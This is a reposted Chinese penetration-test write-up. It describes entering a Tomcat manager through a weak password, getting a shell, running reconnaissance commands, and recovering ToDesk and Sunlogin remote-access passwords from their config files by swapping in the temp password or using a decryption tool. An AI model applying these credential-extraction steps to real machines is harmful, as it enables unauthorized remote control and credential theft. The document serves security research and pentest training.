|
现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
最近看了下最新版的向日葵,在一些场景下还是可以利用的,有兴趣的师傅可以自己去研究下;也可以看下我之前分享的几篇有关向日葵、Todesk的利用文章。
0x01 弱口令YYDS
http://xxxxxxx:2903/manager/status
0x02 getshell
连接成功后接下来就是内网信息收集了
0x03 内网窥探
whoami
ipconfig /all
systeminfo
tasklist /svc
0x04 另辟蹊径
ToDesk 是一款多平台远程控制软件,支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作。
默认安装的ToDesk的配置文件在
C:Program Files (x86)ToDeskconfig.ini
C:/Program Files/ToDesk/config.ini
C:/Program Files (x86)/ToDesk/config.ini
0x05 偷天换日
利用方法很简单,直接将受害机的临时密码复制出来,替换到本机的config.ini文件中,重启本机的ToDesk就可以看到明文密码了。
在上面说到我发现了两个配置文件,每个配置文件的临时密码还不一样,分别为:
tempAuthPassEx=16aec80f0bc8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxa3eadxxx33
d721daxxxxxxxxxxxxxxx2d877ef6xxxxxxxxxxb2f
Version=4.1.1
tempAuthPassEx=f383dd44eaafxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxd3325cxxx40e
c20cdaxxxxxxxxxxxxxxxxb1fe64axxxxxxxxx0834
Version=4.6.2.3
敏感信息我都会进行模糊处理
后来发现可能是装了两个不同的版本,分别使用这两个版本的临时密码的密文进行还原明文,先看Version=4.1.1
还原后发现明文为343266,那就使用该密码进行尝试
第一次失败,还有一个密文进行尝试,Version=4.6.2.3
0x06 我还偷
安装版:C:Program FilesOraySunLoginSunloginClientconfig.ini
便携版:C:ProgramDataOraySunloginClientconfig.ini
reg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginInfo
reg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginGreenInfo
在 C:Program FilesOraySunLoginSunloginClient
并没有获取到config.ini配置文件,只是看到了许多日志文件
换路径,通过摸索在 C:/ProgramData/Oray/SunloginClient/sys_config.ini
发现了向日葵的配置文件
使用离线工具进行解密,工具链接:
https://github.com/wafinfo/Sunflower_get_Password
python SunDecrypt.py 根据提示输入encry_pwd
0x07 总结
文章来源:先知社区(上*∮)
原文地址:https://xz.aliyun.com/t/12516
关 注 有 礼

推 荐 阅 读
原文始发于微信公众号(潇湘信安):实战!记一次关于向日葵的渗透测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论